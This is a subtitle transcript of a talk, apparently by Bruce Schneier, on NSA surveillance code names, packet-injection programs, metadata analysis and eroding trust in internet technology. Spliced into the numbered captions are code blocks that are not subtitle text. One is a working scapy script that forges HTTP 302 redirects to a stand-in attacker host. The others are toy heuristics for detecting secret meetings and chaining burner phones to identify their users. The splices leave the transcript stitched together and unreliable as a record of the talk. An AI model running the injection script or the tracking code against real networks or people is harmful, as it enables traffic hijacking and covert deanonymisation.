1 00:00:00,000 --> 00:00:09,000 Welcome to this talk. This is Bruce Schneier telling us about the NSA, their capabilities, and countermeasures that we can take against them. Thank you very much. 2 00:00:09,000 --> 00:00:19,000 Thank you. 3 00:00:19,000 --> 00:00:31,000 Good afternoon. Thanks for coming. Thanks for listening to this. To me, the coolest thing about all the NSA disclosures in the past six months has been the code names. 4 00:00:31,000 --> 00:00:39,000 I think code names are pretty neat. There are not enough code names in our lives. I think we need to learn how to use code names better. 5 00:00:39,000 --> 00:00:45,000 I'm going to list a few of the code names. The first code name I'm going to talk about is MUSCULAR. 6 00:00:45,000 --> 00:00:55,000 That's the code name for the NSA top secret program to collect Google and Yahoo user data by eavesdropping on the trunk lines between their data centers. 7 00:00:55,000 --> 00:01:04,000 This was probably done with the help of Level 3 Communications. Level 3 was Google's provider. We know Level 3's NSA code name is LITTLE. 8 00:01:04,000 --> 00:01:11,000 I think it's a general rule that if your data supplier has an NSA code name, you're probably pretty screwed. 9 00:01:11,000 --> 00:01:22,000 This is actually different from the NSA's program to collect Google and Yahoo user data by eavesdropping on the links between the browser and the web server. 10 00:01:22,000 --> 00:01:30,000 We don't know the code name for that. But that was probably done with the help of AT&T and other telecom companies. 11 00:01:30,000 --> 00:01:42,000 We know AT&T's code name for some of this is FAIRVIEW. There are a lot of code names associated with the telcos; STORMBREW is one. There's a bunch there. 12 00:01:42,000 --> 00:01:55,000 This is different from PRISM. PRISM is the code name for the top secret NSA program to collect Google and Yahoo user data by asking the companies directly. 13 00:01:55,000 --> 00:02:03,000 That's one set. Another really important code name, which people here should learn about, is QUANTUM. 14 00:02:03,000 --> 00:02:13,000 All those other code names have to do with passive eavesdropping. QUANTUM is the NSA program to actively inject packets into the backbone. 15 00:02:13,000 --> 00:02:21,000 So there are these massive computers. They have code names like TUMULT and TURBULENCE and TURMOIL. 16 00:02:21,000 --> 00:02:28,000 Well, TUMULT also allows data to go back in, as opposed to just being extracted. 17 00:02:28,000 --> 00:02:38,000 There are a lot of different code names associated with QUANTUM. There's QUANTUMINSERT, which is their packet injection attack tool. 18 00:02:38,000 --> 00:02:48,000 We're pretty sure this includes 302 redirect injection and DNS packet injection. Possibly also TCP resets. 19 00:02:48,000 --> 00:03:00,000 There's QUANTUMCOOKIE, which allows the NSA to inject a packet into a stream going back to a user, forcing them to divulge their cookies, and uses that to identify users. 20 00:03:00,000 --> 00:03:05,000 You might be browsing anonymously, someone injects a packet at you, and suddenly you're divulging your Facebook cookie. 21 00:03:05,000 --> 00:03:09,000 The NSA keeps a database of cookies, so they know who people are.
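To make the injection idea concrete, here is a minimal sketch of the generic race-condition technique just described: an on-path observer sees a client's HTTP request and tries to answer with a forged 302 redirect before the real server can. This is the generic, publicly documented technique, not the NSA's actual tool; it assumes the scapy library, and the interface name and redirect target are placeholders.

```python
# Minimal sketch of on-path 302-redirect packet injection: race the real
# server by forging its response to an observed HTTP GET. Illustration only;
# "eth0" and the redirect target are invented placeholders.
from scapy.all import IP, TCP, Raw, send, sniff

REDIRECT = (b"HTTP/1.1 302 Found\r\n"
            b"Location: http://attacker.example/\r\n"
            b"Content-Length: 0\r\n\r\n")

def race(pkt):
    # Only react to packets that look like an HTTP request.
    if pkt.haslayer(Raw) and pkt[Raw].load.startswith(b"GET "):
        ip, tcp = pkt[IP], pkt[TCP]
        reply = (
            # Forge the server's answer: swap addresses and ports,
            # pick up the client's expected sequence number, and ACK
            # the request bytes we just saw.
            IP(src=ip.dst, dst=ip.src)
            / TCP(sport=tcp.dport, dport=tcp.sport,
                  seq=tcp.ack, ack=tcp.seq + len(pkt[Raw].load), flags="PA")
            / Raw(REDIRECT)
        )
        send(reply, verbose=False)  # whoever answers first wins the race

sniff(iface="eth0", filter="tcp port 80", prn=race)
```

The same race works for DNS answers and TCP resets: whichever response arrives first wins, which is why this has to run close to the backbone.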
22 00:03:09,000 --> 00:03:22,000 There's also something called QUANTUMHAND. We saw that in the presentation about the anonymity service Tor. 23 00:03:22,000 --> 00:03:35,000 From the presentation on Tor, we don't know what QUANTUMHAND does. Nicholas Weaver speculated it's a command and control system for NSA malware, which I actually think would be a pretty cool use of an injection system. 24 00:03:35,000 --> 00:03:46,000 There's a bunch of other QUANTUM programs. I think one of the things we can do, usefully, is think about what a system like this would look like, how it would work. 25 00:03:46,000 --> 00:03:50,000 What sorts of things it could do. That will help us figure out how to design around it. 26 00:03:50,000 --> 00:03:57,000 How to design against it. And it's probably true that it does the things we think it does. 27 00:03:57,000 --> 00:04:04,000 Another code name that is related is FOXACID. FOXACID is actually one of the coolest code names they've got. 28 00:04:04,000 --> 00:04:11,000 FOXACID is what they call an exploit orchestrator. Think of Metasploit with a budget. 29 00:04:11,000 --> 00:04:24,000 These are computers that sit on the network. When something like QUANTUM forces you to redirect to that computer, it knows who you are, because it's been told offline. 30 00:04:24,000 --> 00:04:31,000 And it sends you different malware. The malware has all sorts of code names: VALIDATOR, UNITEDRAKE. 31 00:04:31,000 --> 00:04:36,000 My vote for the NSA's stupidest code name: EGOTISTICALGIRAFFE. 32 00:04:36,000 --> 00:04:46,000 I actually did not make that up. The particular exploit that you are served is determined by a program that is code-named 33 00:04:46,000 --> 00:04:48,000 FERRETCANNON. 34 00:04:48,000 --> 00:04:53,000 VALIDATOR happens to be the default exploit that's run against you. 35 00:04:53,000 --> 00:04:58,000 I assume it's Windows. And after you're owned, there are various implants. 36 00:04:58,000 --> 00:05:06,000 We've seen a bunch of these. We saw some of these in that book of TAO implants. 37 00:05:06,000 --> 00:05:13,000 We saw some in a Le Monde document that was released a couple of months ago. 38 00:05:13,000 --> 00:05:19,000 There are a lot of really cool implants: BLACKHEART, MINERALIZE, VAGRANT, HIGHLANDS. 39 00:05:19,000 --> 00:05:23,000 Some of them are designed to jump air gaps. 40 00:05:23,000 --> 00:05:30,000 Some of them are designed to pull what's on the screen. Some of them are designed to pull passwords or find other things. 41 00:05:30,000 --> 00:05:42,000 There are exploits designed to exploit printers. Lots of surveillance tools: CO-TRAVELER; EVILOLIVE is an IP location database. 42 00:05:42,000 --> 00:05:47,000 Lots of analysis tools. We've seen MARINA. We've seen PINWALE. We've seen MAINWAY. 43 00:05:47,000 --> 00:05:54,000 BULLRUN. BULLRUN is the code name for the NSA program to basically subvert internet products and services. 44 00:05:54,000 --> 00:05:59,000 There's a lot here. I don't think anyone's done the full code name glossary. 45 00:05:59,000 --> 00:06:04,000 Probably worth doing. There are certainly hundreds out by now. 46 00:06:04,000 --> 00:06:08,000 The documents are just littered with code names. Some of them we actually don't even know what they mean. 47 00:06:08,000 --> 00:06:11,000 We just see them in passing. 48 00:06:11,000 --> 00:06:17,000 Some of the pages from that TAO implant catalog are full of code names. 49 00:06:17,000 --> 00:06:24,000 The meta moral here, the meta story, is that these keep coming. 50 00:06:24,000 --> 00:06:30,000 We learned about the text message database. 51 00:06:30,000 --> 00:06:35,000 The collection of text messages that's going on.
52 00:06:35,000 --> 00:06:42,000 The meta story is the NSA has turned the internet into a giant surveillance platform. 53 00:06:42,000 --> 00:06:48,000 What's important is that it's robust. It's robust politically. 54 00:06:48,000 --> 00:06:59,000 I started this presentation by naming three different programs to collect Google and Yahoo user data. 55 00:06:59,000 --> 00:07:09,000 These are three different technical accesses, relying on agreements, or at least cooperation, with three different companies. 56 00:07:09,000 --> 00:07:14,000 Relying on three different legal justifications. 57 00:07:14,000 --> 00:07:20,000 The same thing is true, I think, for cell phone data, for internet data, for everything else. 58 00:07:20,000 --> 00:07:23,000 There's a lot of redundancy in the system. 59 00:07:23,000 --> 00:07:27,000 As we think about solutions, it's important to realize 60 00:07:27,000 --> 00:07:32,000 that point solutions are hard, because these aren't point problems. 61 00:07:32,000 --> 00:07:35,000 The NSA continues to lie about its capabilities. 62 00:07:35,000 --> 00:07:39,000 We've started learning the NSA codebook for lying. 63 00:07:39,000 --> 00:07:49,000 We've started learning their interpretations of words like collect, incidentally, target, or directed. 64 00:07:49,000 --> 00:07:53,000 They say things like: we don't collect data. 65 00:07:53,000 --> 00:07:59,000 We don't count it as collecting until we actually look at it. 66 00:07:59,000 --> 00:08:09,000 We don't directly target Americans. 67 00:08:09,000 --> 00:08:15,000 We get them, but not on purpose. 68 00:08:15,000 --> 00:08:23,000 We know they cloak programs in multiple code names to hide their extent and capabilities. 69 00:08:23,000 --> 00:08:27,000 The same program with different code names. 70 00:08:27,000 --> 00:08:33,000 Any time you hear the NSA saying, we don't do this under this program or under this authority, 71 00:08:33,000 --> 00:08:39,000 the odds are 100% they are doing it in some other program and under another authority. 72 00:08:39,000 --> 00:08:43,000 Another thing that is not coming out: 73 00:08:43,000 --> 00:08:47,000 there's a lot of sharing between different organizations. 74 00:08:47,000 --> 00:08:51,000 The NSA, CIA, FBI, DEA. 75 00:08:51,000 --> 00:08:53,000 We know some of this. 76 00:08:53,000 --> 00:08:56,000 We knew from a Reuters story, 77 00:08:56,000 --> 00:09:03,000 which had a slide from an NSA document that talked about the NSA sharing data with the DEA and instructing them to lie 78 00:09:03,000 --> 00:09:07,000 about where it came from in court. 79 00:09:07,000 --> 00:09:11,000 I think there's a lot more sharing going on between the NSA and FBI. 80 00:09:11,000 --> 00:09:13,000 Not just of data, but of technologies. 81 00:09:13,000 --> 00:09:21,000 We know a lot about the FBI's technologies for eavesdropping on cell phone calls. 82 00:09:21,000 --> 00:09:25,000 Some of those fake cell phone tower technologies. 83 00:09:25,000 --> 00:09:29,000 We saw the same things in the NSA TAO toolkit. 84 00:09:29,000 --> 00:09:33,000 It's improbable to me that these are being developed independently. 85 00:09:33,000 --> 00:09:37,000 More likely, one agency develops them and they get shared. 86 00:09:37,000 --> 00:09:41,000 I think legal cover is also shared. 87 00:09:41,000 --> 00:09:45,000 There are companies that will say: we don't cooperate with the NSA. 88 00:09:45,000 --> 00:09:47,000 I think largely they're correct. 89 00:09:47,000 --> 00:09:49,000 They cooperate with the FBI, who fronts for the NSA.
90 00:09:49,000 --> 00:09:51,000 For whatever program is being run. 91 00:09:51,000 --> 00:09:57,000 So I think there's a lot more moving around between agencies. 92 00:09:57,000 --> 00:09:58,000 The NSA's mission. 93 00:09:58,000 --> 00:09:59,000 We know what it is. 94 00:09:59,000 --> 00:10:02,000 We can see it in the documents. 95 00:10:02,000 --> 00:10:06,000 Glenn Greenwald gave a talk at CCC. 96 00:10:06,000 --> 00:10:12,000 He talked about the slogans: collect it all, know it all, exploit it all. 97 00:10:12,000 --> 00:10:16,000 These things permeate the documents. 98 00:10:16,000 --> 00:10:23,000 You can see it in the NSA's almost methodical movement through every communications technology, 99 00:10:23,000 --> 00:10:28,000 trying to capture data, including chat rooms and virtual worlds. 100 00:10:28,000 --> 00:10:30,000 Which sounds ridiculous. 101 00:10:30,000 --> 00:10:33,000 But if you're thinking in terms of: we have to collect everything, 102 00:10:33,000 --> 00:10:34,000 it makes perfect sense. 103 00:10:34,000 --> 00:10:37,000 Why would you leave that? 104 00:10:37,000 --> 00:10:39,000 Why would you leave that channel 105 00:10:39,000 --> 00:10:41,000 unused? 106 00:10:41,000 --> 00:10:45,000 To understand this mission, you really have to understand the NSA's history. 107 00:10:45,000 --> 00:10:48,000 The NSA was born out of the Cold War, 108 00:10:49,000 --> 00:10:54,000 when we were singularly interested in everything happening in the Soviet Union. 109 00:10:54,000 --> 00:10:57,000 And it was almost a voyeuristic interest. 110 00:10:57,000 --> 00:10:59,000 We had to know everything. 111 00:10:59,000 --> 00:11:06,000 And that collect-it-all mentality was focused on the Soviet Union, on the Warsaw Pact, on China, 112 00:11:06,000 --> 00:11:11,000 on the countries that we were eavesdropping on. 113 00:11:11,000 --> 00:11:14,000 We collected an enormous amount of data. 114 00:11:14,000 --> 00:11:16,000 There was a lot less data then. 115 00:11:16,000 --> 00:11:19,000 And it all made some sense. 116 00:11:19,000 --> 00:11:22,000 There were certain trunk lines you needed to listen in on. 117 00:11:22,000 --> 00:11:24,000 And you'd get a lot of data. 118 00:11:24,000 --> 00:11:26,000 Some of it's useful, some of it's not. 119 00:11:26,000 --> 00:11:30,000 Tactical data is much easier to deal with than strategic data. 120 00:11:30,000 --> 00:11:35,000 You have a much easier time figuring out the capabilities of the new Soviet tank than you do 121 00:11:35,000 --> 00:11:37,000 predicting the fall of communism. 122 00:11:37,000 --> 00:11:40,000 Social trends are hard. 123 00:11:40,000 --> 00:11:42,000 That sort of ubiquitous surveillance, 124 00:11:42,000 --> 00:11:46,000 that mentality, really should have died with the Cold War. 125 00:11:46,000 --> 00:11:51,000 But it got a new lease on life with the terrorist attacks of September 11th. 126 00:11:51,000 --> 00:11:56,000 Because the intelligence community was handed an impossible mission, right? 127 00:11:56,000 --> 00:11:57,000 Never again. 128 00:11:57,000 --> 00:11:59,000 Those were their orders. 129 00:11:59,000 --> 00:12:00,000 Right? 130 00:12:00,000 --> 00:12:02,000 Never again is ridiculous. 131 00:12:02,000 --> 00:12:04,000 You can't actually do it.
132 00:12:04,000 --> 00:12:08,000 But if you think about it, if you get that kind 133 00:12:08,000 --> 00:12:13,000 of a quixotic goal of making sure something never happens, 134 00:12:13,000 --> 00:12:19,000 the only way you could possibly achieve that is to know everything that does happen. 135 00:12:19,000 --> 00:12:20,000 Right? 136 00:12:20,000 --> 00:12:26,000 So never again forces you into know everything. 137 00:12:26,000 --> 00:12:34,000 And that mission was aided, really, by the natural trends of information technology. 138 00:12:34,000 --> 00:12:38,000 And I think this is another important thread we really have to understand. 139 00:12:38,000 --> 00:12:43,000 Fundamentally, data is a byproduct of the information society. 140 00:12:43,000 --> 00:12:47,000 Everything we do on computers creates a transaction record. 141 00:12:47,000 --> 00:12:53,000 Data is a byproduct of our information society's socialization. 142 00:12:53,000 --> 00:12:59,000 Every time we interact with people using computers, it creates a transaction record. 143 00:12:59,000 --> 00:13:02,000 Usually of the actual conversation, right? 144 00:13:02,000 --> 00:13:04,000 Voice is the exception. 145 00:13:04,000 --> 00:13:09,000 But a lot more of our conversations happen not merely in recordable form, 146 00:13:09,000 --> 00:13:11,000 but in recorded form. 147 00:13:11,000 --> 00:13:18,000 The act of having a conversation in a text session means it is recorded. 148 00:13:18,000 --> 00:13:24,000 All this data is being increasingly stored, increasingly searched, increasingly used. 149 00:13:24,000 --> 00:13:26,000 And this is just Moore's law. 150 00:13:26,000 --> 00:13:29,000 Storage drops to free; data processing drops to free. 151 00:13:29,000 --> 00:13:34,000 It is way easier to save everything than it is to figure out what to save. 152 00:13:34,000 --> 00:13:35,000 You all know this is true. 153 00:13:35,000 --> 00:13:38,000 That's how you deal with your email. 154 00:13:38,000 --> 00:13:39,000 Right? 155 00:13:39,000 --> 00:13:44,000 I remember, because I'm old enough to remember, when I used to sort my email. 156 00:13:44,000 --> 00:13:46,000 You'd throw away what you didn't need. 157 00:13:46,000 --> 00:13:49,000 You'd put it in different folders, depending on who you were talking to. 158 00:13:49,000 --> 00:13:51,000 You'd keep it all in a taxonomy, sorted. 159 00:13:51,000 --> 00:13:54,000 But there was a year I stopped doing that. 160 00:13:54,000 --> 00:13:55,000 Everything in one folder. 161 00:13:55,000 --> 00:13:58,000 And that was the year that search became cheaper than sort. 162 00:13:58,000 --> 00:14:00,000 And sorting made no sense anymore. 163 00:14:00,000 --> 00:14:03,000 And that's the world we're in. 164 00:14:03,000 --> 00:14:04,000 Right? 165 00:14:04,000 --> 00:14:08,000 And the effect is that we're all leaving digital footprints throughout our lives. 166 00:14:08,000 --> 00:14:15,000 Cloud computing just exacerbates this, because our data is moving away from our control. 167 00:14:15,000 --> 00:14:18,000 And lots of things become possible now. 168 00:14:18,000 --> 00:14:21,000 The notion of wholesale surveillance. 169 00:14:21,000 --> 00:14:27,000 It's sort of fascinating that the NSA is putting everyone on the planet under surveillance. 170 00:14:27,000 --> 00:14:30,000 But they're doing that because we're all carrying cell phones, 171 00:14:30,000 --> 00:14:36,000 where the cell phone system by definition puts us all under surveillance. 172 00:14:36,000 --> 00:14:39,000 Just like email does.
173 00:14:39,000 --> 00:14:43,000 Just like, I don't know, ATM machines do. 174 00:14:43,000 --> 00:14:47,000 And all those things produce data records. 175 00:14:47,000 --> 00:14:51,000 So: wholesale surveillance, surveillance backwards in time, 176 00:14:51,000 --> 00:14:53,000 the death of ephemeral conversation. 177 00:14:53,000 --> 00:14:55,000 We're not really there yet. 178 00:14:55,000 --> 00:14:57,000 I mean, it's already true for politicians. 179 00:14:57,000 --> 00:14:59,000 We're now living in a world, at least in the US, 180 00:14:59,000 --> 00:15:05,000 where pretty much every politician has someone from the opposing party following them constantly with a video camera, 181 00:15:05,000 --> 00:15:07,000 looking for a gaffe. 182 00:15:07,000 --> 00:15:08,000 Right? 183 00:15:08,000 --> 00:15:14,000 That kind of surveillance will become the norm, everywhere, within a few years. 184 00:15:14,000 --> 00:15:17,000 Maybe it's Google Glass, maybe it's something else. 185 00:15:17,000 --> 00:15:24,000 But ephemeral conversation is going to disappear, because there won't be the ability to have those conversations. 186 00:15:24,000 --> 00:15:26,000 Or systems that never forget. 187 00:15:26,000 --> 00:15:29,000 I think this is probably the biggest change that we're not ready for. 188 00:15:29,000 --> 00:15:35,000 I think a lot of our societal lubricant lies in the fact that we have lousy memories. 189 00:15:35,000 --> 00:15:40,000 You know, when I can go home and replay an argument with my wife from two years ago, 190 00:15:40,000 --> 00:15:44,000 to prove I'm right, I'm not convinced I'm better off. 191 00:15:44,000 --> 00:15:48,000 But that's going to be possible. 192 00:15:48,000 --> 00:15:49,000 Right? 193 00:15:49,000 --> 00:15:51,000 The result here is a public-private surveillance partnership. 194 00:15:51,000 --> 00:15:55,000 There's a basic alliance of government and corporate interests. 195 00:15:55,000 --> 00:15:59,000 And NSA surveillance largely piggybacks on corporate capabilities. 196 00:15:59,000 --> 00:16:01,000 I've already mentioned cell phones. 197 00:16:01,000 --> 00:16:04,000 I've mentioned internet cookies. 198 00:16:04,000 --> 00:16:07,000 All of those things happen everywhere. 199 00:16:07,000 --> 00:16:16,000 There's an NSA program, HAPPYFOOT, that tries to geolocate cell phones through apps 200 00:16:16,000 --> 00:16:18,000 that transmit location. 201 00:16:18,000 --> 00:16:25,000 That's separate from the NSA program that tries to geolocate cell phones via the cell towers. 202 00:16:25,000 --> 00:16:26,000 Right? 203 00:16:26,000 --> 00:16:29,000 There's overt and covert collection. 204 00:16:29,000 --> 00:16:31,000 I mentioned Google and Level 3. 205 00:16:31,000 --> 00:16:33,000 And overt collection takes a variety of forms. 206 00:16:33,000 --> 00:16:35,000 Right? We see cooperation. 207 00:16:35,000 --> 00:16:36,000 You know, asking nicely. 208 00:16:36,000 --> 00:16:38,000 We see bribery. 209 00:16:38,000 --> 00:16:39,000 We see threats. 210 00:16:39,000 --> 00:16:41,000 We see legal compulsion. 211 00:16:41,000 --> 00:16:46,000 But fundamentally, surveillance is the business model of the internet. 213 00:16:46,000 --> 00:16:49,000 We build systems that spy on people in exchange for services. 214 00:16:49,000 --> 00:16:52,000 That's the way a lot of the internet works. 215 00:16:52,000 --> 00:16:57,000 And the NSA is happy to piggyback on a lot of those capabilities.
216 00:16:58,000 --> 00:17:01,000 The result is the golden age of surveillance. 217 00:17:01,000 --> 00:17:05,000 I mean, this is the golden age of surveillance. 218 00:17:05,000 --> 00:17:11,000 Even if there were no malice, because of the way our systems naturally work. 219 00:17:11,000 --> 00:17:12,000 Right? 220 00:17:12,000 --> 00:17:16,000 Yesterday, again, President Obama talked about: don't worry, 221 00:17:16,000 --> 00:17:17,000 it's only metadata. 222 00:17:17,000 --> 00:17:18,000 I don't know if you saw the speech. 223 00:17:18,000 --> 00:17:20,000 He said, we're not listening in on your phone calls. 224 00:17:20,000 --> 00:17:24,000 I'm really getting tired of that. Metadata equals surveillance. 225 00:17:25,000 --> 00:17:28,000 Here's an easy thought experiment that bears this out. 226 00:17:28,000 --> 00:17:31,000 Imagine you hired a detective to eavesdrop on somebody. 227 00:17:31,000 --> 00:17:35,000 That detective would plant a bug in his office, his home, his car. 228 00:17:35,000 --> 00:17:38,000 And you'd get a report of the conversations he had. 229 00:17:38,000 --> 00:17:40,000 Right? That's what the president says he's not doing. 230 00:17:40,000 --> 00:17:43,000 If you asked that same detective to put that person under surveillance, 231 00:17:43,000 --> 00:17:44,000 you'd get a different report. 232 00:17:44,000 --> 00:17:49,000 Where he went, who he spoke to, what he read, what he purchased, what he looked at. 233 00:17:49,000 --> 00:17:52,000 Right? That's all metadata. 234 00:17:53,000 --> 00:17:56,000 Right? Metadata equals surveillance. 235 00:17:56,000 --> 00:17:58,000 And when you have all this metadata, 236 00:17:58,000 --> 00:18:02,000 metadata is actually a lot more valuable than the eavesdropping data, 237 00:18:02,000 --> 00:18:05,000 because it tells you a lot more about what's going on. 238 00:18:05,000 --> 00:18:11,000 And the NSA has some very sophisticated analysis tools to deal with all of this metadata. 239 00:18:11,000 --> 00:18:18,000 We saw some of them in the Washington Post article on cell phone location data. 240 00:18:19,000 --> 00:18:22,000 We saw some hints at the tools the NSA is using on this database. 241 00:18:22,000 --> 00:18:24,000 And some of them are pretty cool. 242 00:18:24,000 --> 00:18:28,000 They have a program that looks for pairs of phones 243 00:18:28,000 --> 00:18:32,000 moving towards each other that turn themselves off, 244 00:18:32,000 --> 00:18:36,000 and then turn themselves on again about an hour later, moving away from each other. 245 00:18:36,000 --> 00:18:38,000 They're looking for secret meetings. 246 00:18:38,000 --> 00:18:40,000 It's kind of neat. 247 00:18:40,000 --> 00:18:47,000 They have the cell phone data of US agents, 248 00:18:47,000 --> 00:18:49,000 which they track. 249 00:18:49,000 --> 00:18:55,000 And then they look for cell phones, or series of cell phones, that basically parallel them in location. 250 00:18:55,000 --> 00:18:59,000 They're looking for tails.
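A toy version of that secret-meeting heuristic, for illustration only: the record format, distance, and time thresholds are all invented, and this is obviously not the NSA's actual analytic.

```python
# Toy sketch of the "secret meeting" heuristic described above: two phones
# converge, both go dark, and both reappear about an hour later moving apart.

def dist(p, q):
    return ((p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2) ** 0.5

def looks_like_meeting(a, b, near_km=0.5, min_dark_h=0.5, max_dark_h=2.0):
    """a and b are dicts: 'off'/'on' = (hour, (x_km, y_km)) around a dark gap."""
    (t_off_a, p_off_a), (t_on_a, p_on_a) = a["off"], a["on"]
    (t_off_b, p_off_b), (t_on_b, p_on_b) = b["off"], b["on"]
    converged = dist(p_off_a, p_off_b) < near_km        # close when they went dark
    dark_ok = all(min_dark_h < t_on - t_off < max_dark_h
                  for t_off, t_on in ((t_off_a, t_on_a), (t_off_b, t_on_b)))
    diverging = dist(p_on_a, p_on_b) > dist(p_off_a, p_off_b)  # moving apart after
    return converged and dark_ok and diverging

# Two phones off within 500 m of each other, back on ~1.2 h later, 4 km apart:
alice = {"off": (13.0, (0.0, 0.0)), "on": (14.2, (3.0, 0.0))}
bob   = {"off": (13.1, (0.3, 0.0)), "on": (14.3, (-1.0, 0.0))}
print(looks_like_meeting(alice, bob))   # True
```

The tail-detection idea is the same shape: instead of a converge/dark/diverge pattern, you score how closely one phone's track parallels another's over time.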
251 00:18:59,000 --> 00:19:01,000 They have a system — 252 00:19:01,000 --> 00:19:03,000 I don't think we're sure how it works — 253 00:19:03,000 --> 00:19:05,000 where they try to chain together 254 00:19:05,000 --> 00:19:07,000 burner phones. 255 00:19:07,000 --> 00:19:08,000 Burner phones are disposable phones. 256 00:19:08,000 --> 00:19:11,000 If you watched The Wire, you know what a burner phone is. 257 00:19:11,000 --> 00:19:15,000 They're used for a certain amount of time. 258 00:19:15,000 --> 00:19:18,000 But if you're a person who uses burner phones, if you think about it, 259 00:19:18,000 --> 00:19:20,000 you use one, then another, then another. 260 00:19:20,000 --> 00:19:25,000 And if I have a database of those short-lived anonymous phones, 261 00:19:25,000 --> 00:19:29,000 and I know the locations, and I know the numbers they're calling, 262 00:19:29,000 --> 00:19:31,000 I can probably do a pretty good job chaining them 263 00:19:31,000 --> 00:19:34,000 and figuring out who the person is, 264 00:19:34,000 --> 00:19:36,000 even though they're using burner phones.
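And a toy version of the burner-phone chaining just described, again with an invented record format and weights; the point is just how far location overlap plus called-number overlap gets you.

```python
# Toy sketch of burner-phone chaining: link short-lived anonymous phones whose
# active windows abut, whose cell-tower footprints overlap, and whose called
# numbers overlap. Fields, weights, and threshold are invented for illustration.

def overlap(a, b):
    """Jaccard overlap between two sets."""
    return len(a & b) / len(a | b) if a | b else 0.0

def chain_score(old, new, max_gap_days=7):
    """How plausibly `new` is the same person's next burner after `old`."""
    gap = new["first_day"] - old["last_day"]
    if not 0 <= gap <= max_gap_days:   # successor appears soon after old one dies
        return 0.0
    # Called numbers are a stronger signal than shared towers, so weight them up.
    return overlap(old["towers"], new["towers"]) + 2 * overlap(old["called"], new["called"])

def chain(phones, threshold=0.8):
    """Greedily link each retired phone to its most plausible successor."""
    links = []
    for old in phones:
        candidates = [p for p in phones if p is not old]
        best = max(candidates, key=lambda p: chain_score(old, p), default=None)
        if best is not None and chain_score(old, best) >= threshold:
            links.append((old["id"], best["id"]))
    return links

phones = [
    {"id": "A", "first_day": 0,  "last_day": 30, "towers": {1, 2, 3}, "called": {"x", "y"}},
    {"id": "B", "first_day": 32, "last_day": 60, "towers": {2, 3, 4}, "called": {"x", "y", "z"}},
]
print(chain(phones))   # [('A', 'B')]
```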
265 00:19:36,000 --> 00:19:39,000 And that's just three examples from one database. 266 00:19:39,000 --> 00:19:43,000 I mean, you know, think about the text message database, 267 00:19:43,000 --> 00:19:47,000 think about the email metadata database. 268 00:19:47,000 --> 00:19:50,000 Start putting them together. 269 00:19:50,000 --> 00:19:54,000 You can get a lot of information. 270 00:19:54,000 --> 00:19:57,000 Something that I think our community knows, 271 00:19:57,000 --> 00:19:59,000 but I often have to say this, especially politically: 272 00:19:59,000 --> 00:20:02,000 this is really not just about the NSA. 273 00:20:02,000 --> 00:20:05,000 And it's not even just about the United States. 274 00:20:05,000 --> 00:20:10,000 I mean, the United States spends more on intelligence 275 00:20:10,000 --> 00:20:12,000 than the rest of the world combined. 276 00:20:12,000 --> 00:20:16,000 But this is what any nation state would do. 277 00:20:16,000 --> 00:20:18,000 We're better at it. 278 00:20:18,000 --> 00:20:21,000 We have a very privileged position on the internet, 279 00:20:21,000 --> 00:20:25,000 both in terms of the companies that build and operate the internet, 280 00:20:25,000 --> 00:20:30,000 and in that connectivity tends to flow through the US. 281 00:20:30,000 --> 00:20:33,000 But these techniques are all general. 282 00:20:33,000 --> 00:20:38,000 And we know this: QUANTUM-style packet injection is how China runs the Great Firewall 283 00:20:38,000 --> 00:20:39,000 of China. 284 00:20:39,000 --> 00:20:44,000 And we know other countries do these same things too. 285 00:20:44,000 --> 00:20:47,000 What's happened is the Snowden documents have given us 286 00:20:47,000 --> 00:20:51,000 this extraordinary window into the NSA's activities. 287 00:20:51,000 --> 00:20:56,000 And it's just too interesting not to really look at it. 288 00:20:56,000 --> 00:20:58,000 But other countries do this. 289 00:20:58,000 --> 00:21:00,000 And technology spreads. 290 00:21:00,000 --> 00:21:04,000 There's nothing special about these techniques that makes them 291 00:21:04,000 --> 00:21:06,000 not usable by others. 292 00:21:06,000 --> 00:21:09,000 Today's secret NSA programs become tomorrow's PhD theses 293 00:21:09,000 --> 00:21:11,000 and the next day's hacker tools. 294 00:21:11,000 --> 00:21:16,000 So in a lot of ways, the stuff we're seeing at the NSA today 295 00:21:16,000 --> 00:21:20,000 is a three-to-five-year window on what criminals will do. 296 00:21:20,000 --> 00:21:26,000 A lot of those TAO tools were embedded pieces of hardware 297 00:21:26,000 --> 00:21:28,000 used to subvert systems. 298 00:21:28,000 --> 00:21:31,000 We're already seeing those in point-of-sale terminals, 299 00:21:31,000 --> 00:21:35,000 used to steal credit card numbers. 300 00:21:35,000 --> 00:21:37,000 And this is fundamentally the harm. 301 00:21:37,000 --> 00:21:40,000 When you think about the harm, here's where it is. 302 00:21:40,000 --> 00:21:44,000 We have built an internet that is insecure for everyone. 303 00:21:44,000 --> 00:21:46,000 We have enabled the panopticon. 304 00:21:46,000 --> 00:21:51,000 We have enabled this ubiquitous surveillance. 305 00:21:51,000 --> 00:21:56,000 We now have a complete loss of trust in the technologies. 306 00:21:56,000 --> 00:21:59,000 Loss of trust in the protocols. 307 00:21:59,000 --> 00:22:03,000 The RSA BSAFE toolkit is an interesting example. 308 00:22:03,000 --> 00:22:07,000 Here's an area where we know that the NSA has influenced 309 00:22:07,000 --> 00:22:11,000 a random number generator in a popular crypto toolkit, 310 00:22:11,000 --> 00:22:13,000 made it the default, 311 00:22:13,000 --> 00:22:15,000 and spent 10 million dollars to do that. 312 00:22:15,000 --> 00:22:17,000 It's an interesting program. 313 00:22:17,000 --> 00:22:19,000 I think it was largely a failure, 314 00:22:19,000 --> 00:22:23,000 because we don't hear much about products that have used that. 315 00:22:23,000 --> 00:22:27,000 A lot of people looked at it and said: this is a dumb random number generator. 317 00:22:27,000 --> 00:22:28,000 We're not going to use it. 318 00:22:28,000 --> 00:22:31,000 We'll use another one in the standard. 319 00:22:31,000 --> 00:22:33,000 But that's not the only one. 320 00:22:33,000 --> 00:22:37,000 The program didn't stop with that particular subversion. 321 00:22:37,000 --> 00:22:41,000 But the problem is we don't know the others. 322 00:22:41,000 --> 00:22:44,000 Which is an enormous loss of trust. 323 00:22:44,000 --> 00:22:45,000 Who do you trust? 324 00:22:45,000 --> 00:22:47,000 We have no idea. 325 00:22:48,000 --> 00:22:51,000 I wrote an essay where I talked about some of the metrics you might use 326 00:22:51,000 --> 00:22:52,000 to figure out who to trust. 327 00:22:52,000 --> 00:22:54,000 Maybe big US companies bad, 328 00:22:54,000 --> 00:22:56,000 small open source good. 329 00:22:56,000 --> 00:22:58,000 But we're really just making it up. 330 00:22:58,000 --> 00:22:59,000 We're just trying. 331 00:22:59,000 --> 00:23:01,000 We don't know. 332 00:23:01,000 --> 00:23:04,000 